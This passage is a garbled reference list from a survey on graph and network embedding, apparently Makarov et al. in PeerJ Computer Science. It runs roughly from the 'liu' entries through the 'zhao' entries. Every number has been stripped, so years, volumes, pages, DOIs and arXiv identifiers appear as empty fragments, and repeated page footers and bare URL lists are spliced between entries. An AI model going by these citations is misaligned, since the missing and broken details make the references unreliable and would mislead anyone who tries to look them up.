ieee international conference on data mining. piscataway: ieee, – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /nar/gkx https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /e https://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ liu w, chen p-y, yeung s, suzumura t, chen l. a. principled multilayer network embedding. in: ieee international conference on data mining workshops (icdmw). piscataway: ieee, – . liu x, li q, shen c, peng x, zhou y, guan x. b. learning by sampling and compressing: efficient graph representation learning with extremely limited annotations. arxiv preprint arxiv: . . liu x, murata t, kim k-s, kotarasu c, zhuang c. . a general view for network embedding as matrix factorization. in: proceedings of the twelfth acm international conference on web search and data mining, volume of wsdm ’ . new york: acm, – . liu y, kou z. . predicting who rated what in large-scale datasets. acm sigkdd explorations newsletter ( ): – doi . / . . liu y, zhang x, liu l, li g. c. graph embedding based on characteristic of rooted subgraph structure. in: li g, shen ht, yuan y, wang x, liu h, zhao x, eds. knowledge science, engineering and management. cham: springer international publishing, – . liu z, chen c, li l, zhou j, li x, song l, qi y. a. geniepath: graph neural networks with adaptive receptive paths. arxiv preprint arxiv: . . liu z, zheng vw, zhao z, zhu f, chang kc-c, wu m, ying j. b. semantic proximity search on heterogeneous graph by proximity embedding. in: aaai. – . liu z, zheng vw, zhao z, zhu f, chang kc-c, wu m, ying j. b. distance-aware dag embedding for proximity search on heterogeneous graphs. in: thirty-second aaai conference on artificial intelligence. new york: aaai, – . lu c, jiao p, liu h, wang y, xu h, wang w. . ssne: status signed network embedding. in: yang q, zhou z-h, gong z, zhang m-l, huang s-j, eds. advances in knowledge discovery and data mining. cham: springer international publishing, – . lü l, zhou t. . link prediction in complex networks: a survey. physica a: statistical mechanics and its applications ( ): – doi . /j.physa. . . . lu p-e, chang c-s. . explainable, stable, and scalable graph convolutional networks for learning graph representation. arxiv preprint arxiv: . . lu q, getoor l. . link-based classification. in: proceedings of the th international conference on machine learning (icml- ). new york: acm, – . luo d, nie f, huang h, ding ch. . cauchy graph embedding. in: proceedings of the th international conference on machine learning (icml- ). – . luo h, li y, fu j, glass j. . language modeling with graph temporal convolutional networks. https://openreview.net/forum?id=hjlyzhr tm. luo y, zhao x, zhou j, yang j, zhang y, kuang w, peng j, chen l, zeng j. . a network integration approach for drug-target interaction prediction and computational drug repositioning from heterogeneous information. nature communications ( ): – doi . /s - - - . lv x, hou l, li j, liu z. . differentiating concepts and instances for knowledge graph embedding. arxiv preprint arxiv: . . maaten lv d, hinton g. . visualizing data using t-sne. journal of machine learning research (nov): – . mai g, janowicz k, yan b. . support and centrality: learning weights for knowledge graph embedding models. in: european knowledge acquisition workshop. berlin: springer international publishing, – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/ . http://dx.doi.org/ . / . https://arxiv.org/abs/ . http://dx.doi.org/ . /j.physa. . . https://arxiv.org/abs/ . https://arxiv.org/abs/https://openreview.net/forum?id=hjlyzhr tm http://dx.doi.org/ . /s - - - https://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ makarov i, gerasimova o, sulimov p, korovina k, zhukov l. a. joint node-edge network embedding for link prediction. in: springer proceedings in mathematics and statistic (to appear). berlin: springer international publishing, – . makarov i, gerasimova o, sulimov p, zhukov l. b. co-authorship network embedding and recommending collaborators via network embedding. in: springer proceedings in mathematics and statistic (to appear). berlin: springer international publishing, – . makarov i, gerasimova o, sulimov p, zhukov le. . recommending co-authorship via network embeddings and feature engineering. in: proceedings of the th acm/ieee jcdl. new york: acm, – . makarov i, gerasimova o, sulimov p, zhukov le. c. dual network embedding for representing research interests in the link prediction problem on co-authorship networks. peerj computer science ( ):e doi . /peerj-cs. . malliaros fd, vazirgiannis m. . clustering and community detection in directed networks: a survey. physics reports ( ): – doi . /j.physrep. . . . marcheggiani d, bastings j, titov i. . exploiting semantics in neural machine translation with graph convolutional networks. arxiv preprint arxiv: . . marcheggiani d, titov i. . encoding sentences with graph convolutional networks for semantic role labeling. arxiv preprint arxiv: . . martinez am, kak ac. . pca versus lda. ieee transactions on pattern analysis and machine intelligence ( ): – doi . / . . mcinnes l, healy j, melville j. . umap: uniform manifold approximation and projection for dimension reduction. arxiv preprint arxiv: . . mcpherson m, smith-lovin l, cook jm. . birds of a feather: homophily in social networks. annual review of sociology ( ): – doi . /annurev.soc. . . . mikolov t, sutskever i, chen k, corrado gs, dean j. . distributed representations of words and phrases and their compositionality. in: advances in nips. cambridge: mit press, – . monti f, boscaini d, masci j, rodola e, svoboda j, bronstein mm. . geometric deep learning on graphs and manifolds using mixture model cnns. in: proceedings of the ieee conference on computer vision and pattern recognition. – . monti f, bronstein m, bresson x. . geometric matrix completion with recurrent multi-graph neural networks. in: advances in neural information processing systems. – . monti f, shchur o, bojchevski a, litany o, günnemann s, bronstein mm. . dual-primal graph convolutional networks. arxiv preprint arxiv: . . mousavi sf, safayani m, mirzaei a, bahonar h. . hierarchical graph embedding in vector space by graph pyramid. pattern recognition : – doi . /j.patcog. . . . moyano lg. . learning network representations. european physical journal special topics ( ): – doi . /epjst/e - - . narayanan a, chandramohan m, chen l, liu y, saminathan s. . subgraph vec: learning distributed representations of rooted sub-graphs from large graphs. arxiv preprint arxiv: . . natarajan n, dhillon is. . inductive matrix completion for predicting gene-disease associations. bioinformatics ( ):i –i doi . /bioinformatics/btu . navlakha s, rastogi r, shrivastava n. . graph summarization with bounded error. in: proceedings of the acm sigmod international conference on management of data. new york: acm, – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /j.physrep. . . https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . / . https://arxiv.org/abs/ . http://dx.doi.org/ . /annurev.soc. . . https://arxiv.org/abs/ . http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /epjst/e - - https://arxiv.org/abs/ . http://dx.doi.org/ . /bioinformatics/btu http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ newman me. . a measure of betweenness centrality based on random walks. social networks ( ): – doi . /j.socnet. . . . newman me, girvan m. . finding and evaluating community structure in networks. physical review e ( ): doi . /physreve. . . ni j, cheng w, fan w, zhang x. . self-grouping multi-network clustering. in: ieee th international conference on data mining (icdm). piscataway: ieee, – . nickel m, murphy k, tresp v, gabrilovich e. . a review of relational machine learning for knowledge graphs. proceedings of the ieee ( ): – doi . /jproc. . . nickel m, rosasco l, poggio t. . holographic embeddings of knowledge graphs. arxiv preprint arxiv: . . nickel m, tresp v, kriegel h-p. . a three-way model for collective learning on multi-relational data. in: icml, volume . new york: acm, – . nie f, cai g, li x. . multi-view clustering and semi-supervised classification with adaptive neighbours. in: thirty-first aaai conference on artificial intelligence. new york: aaai, . nie f, zhu w, li x. . unsupervised large graph embedding. in: aaai. – . nie f, zhu w, li x. . unsupervised large graph embedding based on balanced and hierarchical k-means. ieee transactions on knowledge and data engineering pp( ): . niepert m, ahmed m, kutzkov k. . learning convolutional neural networks for graphs. in: international conference on machine learning. – . nikolentzos g, meladianos p, vazirgiannis m. . matching node embeddings for graph similarity. in: aaai. – . nozza d, fersini e, messina e. . cage: constrained deep attributed graph embedding. information sciences : – doi . /j.ins. . . . ortega a, frossard p, kovacevic j, moura jmf, vandergheynst p. a. graph signal processing: overview, challenges, and applications. proceedings of the ieee ( ): – doi . /jproc. . . ortega f, bobadilla j, gutierrez a, hurtado r, li x. b. artificial intelligence scientific documentation dataset for recommender systems. ieee access : – doi . /access. . . ou m, cui p, pei j, zhang z, zhu w. . asymmetric transitivity preserving graph embedding. kdd ' : proceedings of the nd acm sigkdd international conference on knowledge discovery and data mining : – . pan s, hu r, fung s-f, long g, jiang j, zhang c. . learning graph embedding with adversarial training methods. arxiv preprint arxiv: . . pan s, wu j, zhu x, zhang c, wang y. . tri-party deep network representation. network ( ): . pardalos pm, xue j. . the maximum clique problem. journal of global optimization ( ): – doi . /bf . pennington j, socher r, manning c. . glove: global vectors for word representation. in: proceedings of the conference on empirical methods in natural language processing (emnlp). – . perozzi b, al-rfou r, skiena s. . deepwalk: online learning of social representations. proceedings of the th acm sigkdd ic on kdd : – . perozzi b, kulkarni v, chen h, skiena s. . don’t walk, skip!: online learning of multi-scale network embeddings. in: proceedings of the ieee/acm international conference on advances in social networks analysis and mining . new york: acm, – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . /jproc. . https://arxiv.org/abs/ . http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /jproc. . http://dx.doi.org/ . /access. . https://arxiv.org/abs/ . http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ perozzi b, kulkarni v, skiena s. . walklets: multiscale graph embeddings for interpretable network classification. arxiv preprint arxiv: . . phuc lh, yamada m, kashima h. . link prediction on multiple graphs with graph embedding and optimal transport. in: proceedings of the national conference of the society for artificial intelligence, th national conference. jsai, rin . pimentel t, veloso a, ziviani n. . unsupervised and scalable algorithm for learning node representations. in: proceedings of iclr workshop track. – . pirotte a, renders j-m, saerens m. . et al.random-walk computation of similarities between nodes of a graph with application to collaborative recommendation. ieee transactions on knowledge & data engineering ( ): – doi . /tkde. . . qin j, liu l, shen h, hu d. . uniform pooling for graph networks. applied sciences ( ): doi . /app . quiring b, vassilevski ps. . multilevel graph embedding. epub ahead of print september . numerical linear algebra with applications doi . /nla. . ragesh r, sellamanickam s, iyer a, bairi r, lingam v. . hetegcn: heterogeneous graph convolutional networks for text classification. arxiv preprint arxiv: . . ren x, he w, qu m, voss cr, ji h, han j. . label noise reduction in entity typing by heterogeneous partial-label embedding. in: proceedings of the nd acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . ribeiro lf, saverese ph, figueiredo dr. . struc vec: learning node representations from structural identity. proceedings of the rd acm sigkdd international conference on knowledge discovery and data mining : – . rissanen j. . modeling by shortest data description. automatica ( ): – doi . / - ( ) - . robins g, snijders t, wang p, handcock m, pattison p. . recent developments in exponential random graph (p*) models for social networks. social networks ( ): – doi . /j.socnet. . . . rokka chhetri s, al faruque ma. . dynamic graph embedding. cham: springer international publishing, – . rossi e, chamberlain b, frasca f, eynard d, monti f, bronstein m. a. temporal graph networks for deep learning on dynamic graphs. arxiv preprint arxiv: . . rossi e, frasca f, chamberlain b, eynard d, bronstein m, monti f. b. sign: scalable inception graph neural networks. arxiv preprint arxiv: . . roweis st, saul lk. . nonlinear dimensionality reduction by locally linear embedding. science ( ): – doi . /science. . . . rozemberczki b, davies r, sarkar r, sutton c. . gemsec: graph embedding with self clustering. arxiv preprint arxiv: . . rozemberczki b, sarkar r. . fast sequence-based embedding with diffusion graphs. in: international workshop on complex networks. berlin: springer international publishing, – . sahu sk, christopoulou f, miwa m, ananiadou s. . inter-sentence relation extraction with document-level graph convolutional neural network. in: proceedings of the th annual meeting of the association for computational linguistics. florence: association for computational linguistics, – . salha g, hennequin r, vazirgiannis m. . simple and effective graph autoencoders with one-hop linear models. arxiv preprint arxiv: . . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/ . http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /app http://dx.doi.org/ . /nla. https://arxiv.org/abs/ . http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /j.socnet. . . https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /science. . . https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ salim a, shiju s, sumitra s. . design of multi-view graph embedding using multiple kernel learning. engineering applications of artificial intelligence : doi . /j.engappai. . . scarselli f, gori m, tsoi ac, hagenbuchner m, monfardini g. . the graph neural network model. ieee transactions on neural networks ( ): – doi . /tnn. . . sen p, namata gm, bilgic m, getoor l, gallagher b, eliassi-rad t. . collective classification in network data. ai magazine ( ): – doi . /aimag.v i . . serra a, greco d, tagliaferri r. . impact of different metrics on multi-view clustering. in: international joint conference on neural networks (ijcnn). piscataway: ieee, – . sevgili Ö, panchenko a, biemann c. . improving neural entity disambiguation with graph embeddings. in: proceedings of the th annual meeting of the association for computational linguistics: student research workshop. florence: association for computational linguistics, – . shang j, ma t, xiao c, sun j. . pre-training of graph augmented transformers for medication recommendation. arxiv preprint arxiv: . . shavitt y, tankel t. . hyperbolic embedding of internet graph for distance estimation and overlay construction. ieee/acm transactions on networking ( ): – doi . /tnet. . . shaw b, jebara t. . structure preserving embedding. in: proceedings of the th annual international conference on machine learning. new york: acm, – . shen z, zhang y-h, han k, nandi ak, honig b, huang d-s. . mirna-disease association prediction with collaborative matrix factorization. complexity ( ): – doi . / / . shervashidze n, schweitzer p, leeuwen ejv, mehlhorn k, borgwardt km. . weisfeiler-lehman graph kernels. journal of machine learning research (sep): – . shi j, malik j. . normalized cuts and image segmentation. departmental papers (cis) : . shi l, zhang y, cheng j, lu h. . skeleton-based action recognition with directed graph neural networks. in: the ieee conference on computer vision and pattern recognition (cvpr). piscataway: ieee. shi m, tang y, zhu x. . topology and content co-alignment graph convolutional learning. arxiv preprint arxiv: . . shi r, liang t, peng h, jiang l, dai q. . heam: heterogeneous network embedding with automatic meta-path construction. in: li g, shen ht, yuan y, wang x, liu h, zhao x, eds. knowledge science, engineering and management. cham: springer international publishing, – . shuman di, narang sk, frossard p, ortega a, vandergheynst p. . the emerging field of signal processing on graphs: extending high-dimensional data analysis to networks and other irregular domains. ieee signal processing magazine ( ): – doi . /msp. . . si c, chen w, wang w, wang l, tan t. . an attention enhanced graph convolutional lstm network for skeleton-based action recognition. in: the ieee conference on computer vision and pattern recognition (cvpr). piscataway: ieee. sinha a, shen z, song y, ma h, eide d, hsu b-jp, wang k. . an overview of microsoft academic service (mas) and applications. in: proceedings of the th international conference on world wide web, www ’ companion. new york: association for computing machinery, – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.engappai. . http://dx.doi.org/ . /tnn. . http://dx.doi.org/ . /aimag.v i . https://arxiv.org/abs/ . http://dx.doi.org/ . /tnet. . http://dx.doi.org/ . / / https://arxiv.org/abs/ . http://dx.doi.org/ . /msp. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ socher r, chen d, manning cd, ng a. . reasoning with neural tensor networks for knowledge base completion. in: advances in neural information processing systems. cambridge: mit press, – . song l. . structure vec: deep learning for security analytics over graphs. https://www.usenix. org/conference/scainet /presentation/song. song w, xiao z, wang y, charlin l, zhang m, tang j. . session-based social recommendation via dynamic graph attention networks. arxiv preprint arxiv: . . srinivas v, mitra p. . applications of link prediction, chapter . cham: springer international publishing, – . stanovsky g, gruhl d, mendes p. . recognizing mentions of adverse drug reaction in social media using knowledge-infused recurrent models. in: proceedings of the th conference of the european chapter of the association for computational linguistics: volume , long papers. valencia: association for computational linguistics, – . su c, tong j, zhu y, cui p, wang f. . network embedding in biomedical data science. briefings in bioinformatics ( ): – doi . /bib/bby . sun f-y, hoffmann j, tang j. . infograph: unsupervised and semi-supervised graph-level representation learning via mutual information maximization. arxiv preprint arxiv: . . sun j, bandyopadhyay b, bashizade a, liang j, sadayappan p, parthasarathy s. . atp: directed graph embedding with asymmetric transitivity preservation. proceedings of the aaai conference on artificial intelligence : – doi . /aaai.v i . . sun l, wang j, yu ps, li b. a. adversarial attack and defense on graph data: a survey. arxiv preprint arxiv: . . sun m, tang j, li h, li b, xiao c, chen y, song d. b. data poisoning attack against unsupervised node embedding methods. arxiv preprint arxiv: . . sun x, guo j, ding x, liu t. . a general framework for content-enhanced network representation learning. arxiv preprint arxiv: . . tang j, liu h. . unsupervised feature selection for linked social media data. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining, kdd ’ . new york: acm, – . tang j, liu j, zhang m, mei q. a. visualizing large-scale and high-dimensional data. proceedings of the th international conference on world wide web : – . tang j, qu m, wang m, zhang m, yan j, mei q. . line: large-scale information network embedding. proceedings of the th ic on www : – . tang l, liu h. . relational learning via latent social dimensions. proceedings of the th acm sigkdd international conference on knowledge discovery and data mining : – . tang l, liu h. . leveraging social media networks for classification. data mining and knowledge discovery ( ): – doi . /s - - -x. tang m, nie f, jain r. . capped lp-norm graph embedding for photo clustering. in: proceedings of the acm on multimedia conference. new york: acm, – . tenenbaum jb, de silva v, langford jc. . a global geometric framework for nonlinear dimensionality reduction. science ( ): – doi . /science. . . . teng x, liu j. . atrributed graph embedding based on multiobjective evolutionary algorithm for overlapping community detection. in: ieee congress on evolutionary computation (cec). piscataway: ieee, – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/https://www.usenix.org/conference/scainet /presentation/song https://arxiv.org/abs/https://www.usenix.org/conference/scainet /presentation/song https://arxiv.org/abs/ . http://dx.doi.org/ . /bib/bby https://arxiv.org/abs/ . http://dx.doi.org/ . /aaai.v i . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /science. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ tian f, gao b, cui q, chen e, liu t-y. . learning deep representations for graph clustering. in: aaai. – . tian y, hankins ra, patel jm. . efficient aggregation for graph summarization. in: proceedings of the acm sigmod international conference on management of data. new york: acm, – . toivonen h, zhou f, hartikainen a, hinkka a. . compression of weighted graphs. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . trouillon t, dance cr, gaussier É, welbl j, riedel s, bouchard g. . knowledge graph completion via complex tensor factorization. journal of machine learning research ( ): – . trouillon t, nickel m. . complex and holographic embeddings of knowledge graphs: a comparison. arxiv preprint arxiv: . . tsitsulin a, mottin d, karras p, müller e. . verse: versatile graph embeddings from similarity measures. in: proceedings of the world wide web conference. – . tsitsulin a, munkhoeva m, perozzi b. . just slaq when you approximate: accurate spectral distances for web-scale graphs. in: proceedings of the web conference . – . tu c, liu h, liu z, sun m. . cane: context-aware network embedding for relation modeling. proceedings of the th annual meeting of the association for computational linguistics (volume : long papers) : – . tu c, zhang w, liu z, sun m. . max-margin deepwalk: discriminative learning of network representation. in: proceedings of the twenty-fifth international joint conference on artificial intelligence (ijcai- ), volume . – . vashishth s, bhandari m, yadav p, rai p, bhattacharyya c, talukdar p. . incorporating syntactic and semantic information in word embeddings using graph convolutional networks. in: proceedings of the th annual meeting of the association for computational linguistics. florence: association for computational linguistics, – . vaswani a, shazeer n, parmar n, uszkoreit j, jones l, gomez an, kaiser l, polosukhin i. . attention is all you need. in: advances in neural information processing systems. cambridge: mit press, – . veličković p, cucurull g, casanova a, romero a, lio p, bengio y. . graph attention networks. arxiv preprint arxiv: . . veyseh apb, nguyen th, dou d. . graph based neural networks for event factuality prediction using syntactic and semantic structures. arxiv preprint arxiv: . . vishwanathan svn, schraudolph nn, kondor r, borgwardt km. . graph kernels. journal of machine learning research (apr): – . wang d, cui p, zhu w. . structural deep network embedding. in: proceedings of the nd acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . wang m. . predicting rich drug-drug interactions via biomedical knowledge graphs and text jointly embedding. arxiv preprint arxiv: . . wang p, wu q, cao j, shen c, gao l, van den hengel a. . neighbourhood watch: referring expression comprehension via language-guided graph attention networks. arxiv preprint arxiv: . . wang p, xu b, wu y, zhou x. . link prediction in social networks: the state-of-the-art. science china information sciences ( ): – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ wang q, mao z, wang b, guo l. a. knowledge graph embedding: a survey of approaches and applications. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . wang s, huang e, cairns j, peng j, wang l, sinha s. a. identification of pathways associated with chemosensitivity through network embedding. plos computational biology ( ): e doi . /journal.pcbi. . wang s, qu m, peng j. b. prosnet: integrating homology with molecular networks for protein function prediction. in: pacific symposium on biocomputing . world scientific, – . wang s, tang j, aggarwal c, chang y, liu h. c. signed network embedding in social media. in: proceedings of the siam international conference on data mining. siam, – . wang x, bo d, shi c, fan s, ye y, yu ps. a. a survey on heterogeneous graph embedding: methods, techniques, applications and sources. arxiv preprint arxiv: . . wang x, cui p, wang j, pei j, zhu w, yang s. d. community preserving network embedding. in: aaai. – . wang z, ye x, wang c, cui j, yu p. b. network embedding with completely-imbalanced labels. epub ahead of print february . ieee transactions on knowledge and data engineering doi . /tkde. . . wang z, zhang j, feng j, chen z. . knowledge graph embedding by translating on hyperplanes. in: aaai, volume . – . wang z, zheng l, li y, wang s. b. linkage based face clustering via graph convolution network. in: the ieee conference on computer vision and pattern recognition (cvpr). piscataway: ieee. waradpande v, kudenko d, khosla m. . deep reinforcement learning with graph-based state representations. arxiv preprint arxiv: . . watts dj, strogatz sh. . collective dynamics of ‘small-world’ networks. nature ( ): – doi . / . wei x, xu l, cao b, yu ps. . cross view link prediction by learning noise-resilient representation consensus. in: proceedings of the th international conference on world wide web. international world wide web conferences steering committee, – . weng z, zhang w, dou w. . adversarial attention-based variational graph autoencoder. ieee access : – . white s, smyth p. . a spectral clustering approach to finding communities in graphs. in: proceedings of the siam international conference on data mining. siam, – . wilson rc, hancock er, pekalska e, duin rp. . spherical and hyperbolic embeddings of data. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . wold s, esbensen k, geladi p. . principal component analysis. chemometrics and intelligent laboratory systems ( – ): – doi . / - ( ) - . wu c, zhou y, tan l, teng c. . link prediction based on graph embedding method in unweighted networks. in: th chinese control conference (ccc). – . wu q, zhang h, gao x, he p, weng p, gao h, chen g. a. dual graph attention networks for deep latent representation of multifaceted social effects in recommender systems. arxiv preprint arxiv: . . wu z, pan s, chen f, long g, zhang c, yu ps. b. a comprehensive survey on graph neural networks. arxiv preprint arxiv: . . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /journal.pcbi. https://arxiv.org/abs/ . http://dx.doi.org/ . /tkde. . https://arxiv.org/abs/ . http://dx.doi.org/ . / http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . / - ( ) - https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ xiaojin z, zoubin g. . learning from labeled and unlabeled data with label propagation. tech. rep., technical report cmu-cald- – . carnegie mellon university. https://citeseerx.ist.psu.edu/viewdoc/download?doi= . . . . &rep=rep &type=pdf. xie m, yin h, wang h, xu f, chen w, wang s. . learning graph-based poi embedding for location-based recommendation. proceedings of the th acm international on conference on information and knowledge management : – . xiong c, power r, callan j. . explicit semantic ranking for academic search via knowledge graph embedding. in: proceedings of the th international conference on world wide web. international world wide web conferences steering committee, – . xu l, wei x, cao j, yu ps. . embedding of embedding (eoe): joint embedding for coupled heterogeneous networks. in: proceedings of the tenth acm international conference on web search and data mining. new york: acm, – . xu x, yuruk n, feng z, schweiger ta. . scan: a structural clustering algorithm for networks. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . xue z, li g, wang s, zhang c, zhang w, huang q. . gomes: a group-aware multi-view fusion approach towards real-world image clustering. in: ieee international conference on multimedia and expo (icme). piscataway: ieee, – . yamanishi y, araki m, gutteridge a, honda w, kanehisa m. . prediction of drug-target interaction networks from the integration of chemical and genomic spaces. bioinformatics ( ):i –i doi . /bioinformatics/btn . yamanishi y, kotera m, moriya y, sawada r, kanehisa m, goto s. . dinies: drug-target interaction network inference engine based on supervised analysis. nucleic acids research (w ):w –w doi . /nar/gku . yan b, wang c. . graphae: adaptive embedding across graphs. in: ieee th international conference on data engineering (icde). piscataway: ieee, – . yan z, ge j, wu y, li l, li t. . automatic virtual network embedding: a deep reinforcement learning approach with graph convolutional networks. ieee journal on selected areas in communications ( ): – doi . /jsac. . . yanardag p, vishwanathan s. . deep graph kernels. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . yang b, yih w-t, he x, gao j, deng l. . embedding entities and relations for learning and inference in knowledge bases. arxiv preprint arxiv: . . yang c, liu z, zhao d, sun m, chang e. . network representation learning with rich text information. in: twenty-fourth international joint conference on artificial intelligence. – . yang l, xiao z, jiang w, wei y, hu y, wang h. . dynamic heterogeneous graph embedding using hierarchical attentions. in: jose jm, yilmaz e, magalhães j, castells p, ferro n, silva mj, martins f, eds. advances in information retrieval. cham: springer international publishing, – . yang l, zhan x, chen d, yan j, loy cc, lin d. . learning to cluster faces on an affinity graph. in: the ieee conference on computer vision and pattern recognition (cvpr). piscataway: ieee. yang y, wang h. . multi-view clustering: a survey. big data mining and analytics ( ): – doi . /bdma. . . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/https://citeseerx.ist.psu.edu/viewdoc/download?doi= . . . . &rep=rep &type=pdf http://dx.doi.org/ . /bioinformatics/btn http://dx.doi.org/ . /nar/gku http://dx.doi.org/ . /jsac. . https://arxiv.org/abs/ . http://dx.doi.org/ . /bdma. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ yang z, cohen ww, salakhutdinov r. a. revisiting semi-supervised learning with graph embeddings. arxiv preprint arxiv: . . yang z, tang j, cohen ww. b. multi-modal bayesian embeddings for learning social knowledge graphs. in: ijcai. – . ye y, hou s, chen l, lei j, wan w, wang j, xiong q, shao f. . out-of-sample node representation learning for heterogeneous graph in real-time android malware detection. in: proceedings of the twenty-eighth international joint conference on artificial intelligence, ijcai- . international joint conferences on artificial intelligence organization, – . ying r, bourgeois d, you j, zitnik m, leskovec j. . gnn explainer: a tool for post-hoc explanation of graph neural networks. arxiv preprint arxiv: . . ying r, he r, chen k, eksombatchai p, hamilton wl, leskovec j. a. graph convolutional neural networks for web-scale recommender systems. arxiv preprint arxiv: . . ying z, you j, morris c, ren x, hamilton w, leskovec j. b. hierarchical graph representation learning with differentiable pooling. in: advances in neural information processing systems. cambridge: mit press, – . you j, ying r, ren x, hamilton wl, leskovec j. . graphrnn: a deep generative model for graphs. arxiv preprint arxiv: . . yu w, zheng c, cheng w, aggarwal cc, song d, zong b, chen h, wang w. . learning deep network representations with adversarially regularized autoencoders. in: proceedings of the th acm sigkdd international conference on knowledge discovery & data mining. cambridge: acm, – . yuan h, ji s. . structpool: structured graph pooling via conditional random fields. in: international conference on learning representations.. yuan s, wu x, xiang y. . sne: signed network embedding. in: pacific-asia conference on knowledge discovery and data mining. berlin: springer, – . zeng h, zhou h, srivastava a, kannan r, prasanna vk. . graphsaint: graph sampling based inductive learning method. arxiv preprint arxiv: . . zhai s, zhang z. . dropout training of matrix factorization and autoencoder for link prediction in sparse graphs. in: proceedings of the siam international conference on data mining. siam, – . zhang c, ren m, urtasun r. . graph hypernetworks for neural architecture search. in: international conference on learning representations. iclr.. zhang d, dai x, wang x, wang y, davis ls. a. man: moment alignment network for natural language moment retrieval via iterative graph adjustment. arxiv preprint arxiv: . . zhang d, yin j, zhu x, zhang c. a. collective classification via discriminative matrix factorization on sparsely labeled networks. in: proceedings of the th acm international on conference on information and knowledge management. new york: acm, – . zhang d, yin j, zhu x, zhang c. b. homophily, structure, and content augmented network representation learning. in: ieee th international conference on data mining (icdm). piscataway: ieee, – . zhang h, shang x, luan h, wang m, chua t-s. . learning from collective intelligence: feature learning using social images and tags. acm transactions on multimedia computing, communications, and applications (tomm) ( ): . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ zhang h, shang x, luan h, yang y, chua t-s. . learning features from large-scale, noisy and social image-tag collection. in: proceedings of the rd acm international conference on multimedia. new york: acm, – . zhang h, zheng t, gao j, miao c, su l, li y, ren k. b. towards data poisoning attack against knowledge graph embedding. arxiv preprint arxiv: . . zhang h, zhou j, li r. . enhanced unsupervised graph embedding via hierarchical graph convolution network. mathematical problems in engineering ( ): – doi . / / . zhang j, shi x, zhao s, king i. c. star-gcn: stacked and reconstructed graph convolutional networks for recommender systems. arxiv preprint arxiv: . . zhang q, wang h. . not all links are created equal: an adaptive embedding approach for social personalized ranking. in: proceedings of the th international acm sigir conference on research and development in information retrieval. new york: acm, – . zhang w, fang y, liu z, wu m, zhang x. a. mg vec: learning relationship-preserving heterogeneous graph representations via metagraph embedding. ieee transactions on knowledge and data engineering . https://ieeexplore.ieee.org/abstract/document/ . zhang w, shang r, jiao l. . complex network graph embedding method based on shortest path and moea/d for community detection. applied soft computing : . zhang y, chen x. . explainable recommendation: a survey and new perspectives. arxiv preprint arxiv: . . zhang y, wang d, zhang y. d. neural ir meets graph embedding: a ranking model for product search. arxiv preprint arxiv: . . zhang z, bu j, ester m, zhang j, yao c, li z, wang c. b. learning temporal interaction graph embedding via coupled memory networks. in: proceedings of the web conference , www ’ . new york: association for computing machinery, – . zhang z, cui p, zhu w. . deep learning on graphs: a survey. arxiv preprint arxiv: . . zhao g, li j, wang l, qian x, fu y. . graphseq seq: graph-sequence-to-sequence for neural machine translation. https://openreview.net/forum?id=b fa oactq. zhao x, chang a, sarma ad, zheng h, zhao by. . on the embeddability of random walk distances. proceedings of the vldb endowment ( ): – doi . / . . zhao y, liu z, sun m. . representation learning for measuring entity relatedness with rich information. in: twenty-fourth international joint conference on artificial intelligence. – . zhao z, yang q, cai d, he x, zhuang 